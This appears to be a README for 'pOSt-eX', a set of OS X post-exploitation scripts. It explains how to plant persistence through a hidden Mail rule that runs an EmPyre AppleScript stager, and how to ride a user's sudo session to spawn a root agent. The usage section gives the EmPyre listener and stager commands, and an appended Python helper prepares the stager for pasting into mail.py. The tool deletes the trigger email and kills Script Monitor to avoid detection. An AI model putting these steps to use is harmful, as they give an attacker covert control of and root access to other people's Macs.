pOSt-eX: Post-exploitation scripts for OS X persistence and privesc
pOSt-eX – OS X post-exploitation scripts
- mail.py – Creates an AppleScript payload with EmPyre and configures a Mail rule to launch it
- persist.py – EmPyre module implementation of mail.py
- monitor.py – Piggybacks off a user’s sudo session to spawn an agent with root privileges
- piggyback.py – EmPyre module implementation of monitor.py
MailPersist – Post-exploitation script for OS X persistence
ABOUT:
This script creates a new rule in the OS X Mail application that automatically triggers an AppleScript payload whenever an email arrives with a trigger word in its subject.
The trigger email is deleted before it becomes visible, and Script Monitor is killed immediately after the Python stager executes, so there should be no visual indicators.
Download
git clone https://github.com/n00py/pOSt-eX.git
Usage
Creating an AppleScript payload with EmPyre
(EmPyre) > listeners
(EmPyre: listeners) > set Name mylistener
(EmPyre: listeners) > execute
(EmPyre: listeners) > usestager applescript mylistener
(EmPyre: stager/applescript) > execute
Open mail.py and paste the output into the specified area. Change the trigger word as you see fit.
The AppleScript payload from EmPyre needs two modifications before it is pasted:
- Double up the backslash characters
- Remove the final double quote
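The following Python helper is an added example, not code from pOSt-eX or EmPyre. It applies the two edits above mechanically and shows why the first one matters: the pasted text is assumed to end up inside a Python string literal in mail.py (the real template is not shown here), so the interpreter halves the backslashes again and an un-doubled `\"` would collapse to a bare quote and break the nested shell quoting. SAMPLE_STAGER is a constructed stand-in for the stager output; the helper names are hypothetical.

```python
"""Apply the two README edits to an EmPyre applescript stager line and show
why they matter.  Added example; not part of pOSt-eX or EmPyre."""
import ast

# Constructed stand-in for the applescript stager output.  Real EmPyre
# output carries a long base64 blob instead of `import sys,base64`; what
# matters here is the nested quoting: AppleScript's `do shell script "..."`
# wraps a shell command that itself uses backslash-escaped double quotes.
SAMPLE_STAGER = 'do shell script "echo \\"import sys,base64\\" | python &"'


def prepare_for_paste(stager: str) -> str:
    """Return the text to paste into mail.py.

    Edit 1: double every backslash, because the pasted text is assumed to sit
            inside a Python string literal and the interpreter will halve
            them again when it loads the script.
    Edit 2: drop the final double quote, which the surrounding template is
            expected to supply itself.
    """
    text = stager.rstrip()
    if not text.endswith('"'):
        raise ValueError("stager does not end with a double quote")
    text = text[:-1]                    # edit 2
    return text.replace("\\", "\\\\")   # edit 1


def as_written_to_disk(pasted: str) -> str:
    """Decode `pasted` the way the interpreter would if it appeared inside a
    triple-single-quoted Python literal (assumed layout), i.e. the
    AppleScript text that would actually reach the file written out."""
    return ast.literal_eval("'''" + pasted + "'''")


def unescaped_quote_count(applescript: str) -> int:
    """Count double quotes that are not backslash-escaped.  For a body whose
    closing quote the template supplies, exactly one (the opener after
    `do shell script`) should remain unescaped; any more means the shell
    command's inner quotes have been unescaped and the line will not run."""
    count = 0
    for i, ch in enumerate(applescript):
        if ch == '"' and (i == 0 or applescript[i - 1] != "\\"):
            count += 1
    return count


if __name__ == "__main__":
    pasted = prepare_for_paste(SAMPLE_STAGER)
    good = as_written_to_disk(pasted)
    # Same payload with only the quote removed but backslashes left single.
    bad = as_written_to_disk(SAMPLE_STAGER[:-1])
    print("paste this:      ", pasted)
    print("lands on disk as:", good, "| unescaped quotes:", unescaped_quote_count(good))
    print("without doubling:", bad, "| unescaped quotes:", unescaped_quote_count(bad))
```

Run it once against your real stager output before editing mail.py: the "lands on disk as" line should read exactly like the EmPyre output minus its last quote, and the unescaped quote count should be 1.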
Tutorial
- https://www.n00py.io/2016/10/using-email-for-persistence-on-os-x/
- https://www.n00py.io/2016/10/privilege-escalation-on-os-x-without-exploits/